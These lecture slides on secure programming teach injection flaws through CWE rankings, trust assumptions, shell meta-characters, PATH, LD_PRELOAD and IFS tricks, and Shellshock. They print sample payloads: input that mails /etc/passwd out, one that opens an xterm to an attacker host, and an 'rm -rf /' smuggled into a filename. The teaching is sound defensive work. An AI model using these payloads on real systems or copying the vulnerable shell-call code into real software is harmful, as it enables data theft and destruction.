Secure Programming Lecture 7: Injection

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Outline

Ranking vulnerabilities by type

Trust assumptions

Command injection
  Meta-characters in shell commands
  Environment variables

Summary
What is CWE?

- Idea: organise CVEs into categories of problem
- Use categories to describe scope of issues/protection
- **Weaknesses** classify **Vulnerabilities**
What is CWE?

A **CWE** is an identifier such as CWE-287
- Also with a name, e.g. **Improper Authentication**
- CWEs are organised into a hierarchy:
  - *weakness classes* (parents), and *base weaknesses*
  - each CWE can be located at several positions
  - the hierarchy provides multiple *views*
  - we’ll look in more detail later

- CWE is also intended as a unifying taxonomy
The Most Dangerous Software Errors

- MITRE and SANS surveyed the top CWE categories
- Result: top 25 software errors by CWE
- Last updated 2011
- Ranking is by a number of measures, including e.g.
  - judgement of typical risk level
  - prevalence

The OWASP Top 10 is a similar ranking of error types undertaken by the OWASP, the Open Web Application Security Project, last updated 2013 but with an update due this year. We’ll look at this later.
NVD CVE->CWE assignments (incomplete)
### MITRE/SANS Top 3 CWEs in 2011

<table>
<thead>
<tr>
<th>Rank</th>
<th>CWE</th>
<th>Name</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.</td>
<td>CWE-89</td>
<td>SQL Injection</td>
</tr>
<tr>
<td>2.</td>
<td>CWE-78</td>
<td>OS Command Injection</td>
</tr>
<tr>
<td>3.</td>
<td>CWE-120</td>
<td>Classic Buffer Overflow</td>
</tr>
</tbody>
</table>

**Full names:**

- **CWE-89**: *Improper Neutralization of Special Elements used in an SQL Command*
- **CWE-78**: *Improper Neutralization of Special Elements used in an OS Command*
- **CWE-120**: *Buffer Copy without Checking Size of Input*
What is Injection?

Here’s a fragment of the CWE hierarchy:

- **CWE-74: Injection**
  - Improper Neutralization of Special Elements in Output used by a Downstream Component
- **CWE-77: Command Injection**
  - **CWE-89: SQL Injection**
  - **CWE-120: OS Command Injection**
Improper neutralization of special elements

This is jargon for failing to:

ALWAYS CHECK YOUR INPUTS!

- **Most important lesson** in secure programming!
- Assume inputs can be influenced by adversary
- Injection attacks rely on devious inputs
- “Special elements” are usually *meta-characters*
- Must do **input validation** or **sanitization**
A “downstream component” might be

- a call to a library function, to
  - show a picture
  - play a movie file
  - **execute an OS command**
- a message sent to another service, to
  - send a web query via REST or SOAP
  - **query a database**
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Misplaced trust

Remember the **Trusted Code Base**, is the part of the system that can cause damage.

Programmers make *trust assumptions* concerning which parts of the system they believe will behave as expected.

Sometimes the reasoning is **faulty**. E.g.,

- OS is hardened, firewall blocks incoming traffic
- ...so network inputs can be believed

**Question.** Why might this kind of reasoning be unreliable?
Implicit assumptions may be wrong

**WRONG ASSUMPTION**: compiled programs are “unreadable binary gobbledygook”

- binaries are merely *tricky* to read (cf Lab 1)
- they obscure, don’t conceal... even if obfuscated
- reverse engineering is well supported by tools
- $\Rightarrow$ embedded secrets will be discovered
- $\Rightarrow$ client/server communication will be subverted
Implicit assumptions may be wrong

**WRONG ASSUMPTION**: my web page checks its input, so it has the right format when the form data arrives

- attacker can copy page, turn off JavaScript checks
- may construct a HTTP request explicitly
- modify requests just before they are sent
  - *Tamper Data* Firefox plugin good for trying this
- ⇒ all inputs need re-validation server side
- ⇒ special encodings may be used to hide payloads
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Operating system commands in code

Programmers often insert *system command* calls in application code.

These are interpreted (in Unix and Windows) by a *command shell*.

Why are they used?

- Programming language has no suitable library
- **Convenience, time saving**
  - command shell easier to use than library
Example CGI program in Python

#!/usr/bin/python
import cgi, os

print "Content-type: text/html";
print

form = cgi.FieldStorage()
message = form["contents"].value
recipient = form["to"].value
tmpfile = open("/tmp/cgi-mail", "w")

tmpfile.write(message)
tmpfile.close()

os.system("/usr/bin/sendmail" + recipient + "< /tmp/cgi-mail")
os.unlink("/tmp/cgi-mail")

print "<html><h3>Message sent.</h3></html>"

(Example taken from Building Secure Software, p.320)
Normal use

```
import os

recipient = input("Enter recipient email: ")

os.system("/usr/bin/sendmail" + recipient + "< /tmp/cgi-mail")
```

recipient is taken from a web form.
It should be an email address:

```
niceperson@friendlyplace.com
```
Malicious use

```python
os.system("/usr/bin/sendmail" + recipient + "< /tmp/cgi-mail")
```

recipient is taken from a web form.

But the **attacker can control it!**

```plaintext
attacker@hotmail.com < /etc/passwd; #
```

Mails the content of the password file!
Malicious use

```python
os.system("/usr/bin/sendmail" + recipient + "< /tmp/cgi-mail")
```

recipient is taken from a web form.

But the **attacker can control it!**

```shell
attacker@hotmail.com < /etc/passwd; #
```

Mails the content of the password file!

Recall that the password file on Unix contains a list of usernames on the systems. It used to contain passwords, but on modern systems these are in a *shadow* password file. Still, leaking `/etc/passwd` or registry database files on Windows is not wise (why?).
Malicious use

```python
os.system("/usr/bin/sendmail" + recipient + "< /tmp/cgi-mail")
```

recipient is taken from a web form.

But the **attacker can control it!**

```bash
attackerhotmail.com < /etc/passwd; export DISPLAY=proxy.attacker.org:0; /usr/X11R6/bin/xterm&; #
```

Mails the password file *and* launches a remote terminal on the attacker’s machine!
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Summary
Metadata and meta-characters

**Metadata** accompanies the main data and represents additional information about it.

- how to display textual strings by representing *end-of-line* characters.
- where a string ends, with an *end-of-string* marker.
- **mark-up** such as HTML directives

“Metadata” can also refer (e.g., in law, privacy policies) to parts of communications such as phone calls and email messages: To, From, When, ... everything except the message content.

**Question.** Apart from injection attacks, why might metadata be a concern?
In-band versus out-of-band

**In-band representation** embeds metadata into the data stream itself.

- Length of C-style strings: encoded with NUL character terminator in the data stream.

**Out-of-band representation** separates metadata from data.

- Length of Java-style strings: stored separately outside the string.

**Exercise.** Discuss the pros and cons of each approach.
Familiar meta-characters

Meta-characters are used so commonly in some string encoded datatypes, we forget they are there.

Common cases are

- **separators** or **delimiters** used to encode multiple items in one string
- **escape-sequences** to describe additional data, e.g. Unicode characters or binary data. Not metadata, but uses *meta-characters* to represent the actual data.

**Question.** What kind of programming vulnerabilities may lurk around meta-characters?
Familiar meta-characters

Examples datatypes represented with meta-characters:

➤ A **filename with path**, `/var/log/messages`, `../etc/passwd`
  ➤ the *directory separator* `/`
  ➤ parent sequence `..`

➤ Windows file or registry paths (separator `\`)
➤ Unix PATH variables (separator `:`)
➤ **Email addresses** which use `@` to delimit the domain name

**Exercise.** Think of some more examples of meta-characters used in your favourite systems or applications.
### Some meta-characters for shells

<table>
<thead>
<tr>
<th>Char</th>
<th>Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>#</td>
<td>Comment, ignore rest of line</td>
</tr>
<tr>
<td>;</td>
<td>Terminate command</td>
</tr>
<tr>
<td>'</td>
<td>Backtick command <code>cmd</code> inserts output of <code>cmd</code></td>
</tr>
<tr>
<td>&quot;</td>
<td>Quote with substitution: &quot;$HOME&quot; = /Users/david</td>
</tr>
<tr>
<td>'</td>
<td>Quote literally: ' $HOME ' = $HOME</td>
</tr>
</tbody>
</table>

Many others:

`^ $ ? % & ( ) > < [ ] - * ! . ~ | \t \r \n` [space]

**Exercise.** If you don’t know (or even if you think you do!), try to find out how these characters are treated when parsing commands for the **ash** shell.
Sub-process invocation with C

- `system()` executes a given command in a shell, equivalently to `/bin/sh -c <cmd>`
- `popen()` similarly executes a command as a sub-process, returning a pipe to send or read data.

Other languages providing similar facilities are often built on the C-library equivalents.

These are risky as they invoke a `shell` to process the commands.
Here’s an example from the Python documentation which recommends *against* the convenience of using a shell interpreter for the `call()` system call function.

```python
>>> from subprocess import call
>>> filename = input("What file would you like to display?\n")
What file would you like to display?
non_existent; rm -rf / #
>>> call("cat " + filename, shell=True) # Uh-oh. This will end badly..
```
Differences in meta-characters

Some attacks exploit differences in meta-characters between languages. Here’s a Perl CGI fragment:

```perl
open(FH, ">$username.txt") || die("$!");
print FH $data;
close (FH);
```

- Perl doesn’t treat ASCII NUL as a terminator
- But shell conventions are used for open args
- So if username=evilcmd.pl%00, above will create a file evilcmd.pl
- ...and put the string $data into it
- ...giving a possible code injection

(The fix is to avoid this form of open)
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Summary
Commands are influenced by the environment

- Environment variables are another form of input!
- The attacker may be able to change them
Subverting the PATH

- The PATH environment variable defines a search path to find programs
- If commands are called without explicit paths, the “wrong” version may be found

An old Unix default was to favour developer convenience, putting the current working directory first on the PATH:

```
PATH=.:/bin:/usr/bin:/usr/local/bin
```

**Question.** Why might this be risky and unpredictable?
Pre-loading attacks on Windows

If an application calls `loadLibrary` with just the name of the DLL, the default safe search order is:

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable.

See [Dynamic Link Library Security](https://msdn.microsoft.com) on MSDN.

**Question.** How could an attacker load a fake DLL?
Similarly, Unix systems use a search path which can be defined/overridden by variables such as:

- LD_LIBRARY_PATH
- LD_PRELOAD

If the attacker can influence these paths, she can change the libraries which get loaded.

(modern libraries avoid using these variables for suid-root programs run by non-root users)
Changing the parser: IFS

An old hack is to change the IFS (inter-field separator) used by the shell to parse words.

```bash
$ export IFS="o"
$ var='hel lodavid'
$ echo $var
hell david
```

Suppose the attacker sets IFS="/", it may change a safe call

```bash
system("/bin/safeprog")
```

into one which references the PATH variable

```bash
system(" bin safeprog")
```

and `sh -c bin safeprog` would be executed.
Infamous bug: Bash “Shellshock” (2014)

- Millions of servers and embedded systems were vulnerable to remote command execution.
- Rapid cascade of problems starting with CVE-2014-6271.

**Exercise.** Investigate the Shellshock CVEs and explain why they occurred. Why do you think they took so long to be found?
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Summary
Review questions

CWEs

- Explain: “Improper Neutralization of Special Elements in Output used by a Downstream Component” and other Top 25s.

OS command injections

- Why are OS commands executed by application programs?
- Give two mechanisms by which OS commands may be injected by an attacker.
Examples in this lecture are taken from *Building Secure Software* and *The Art of Software Security Assessment*. 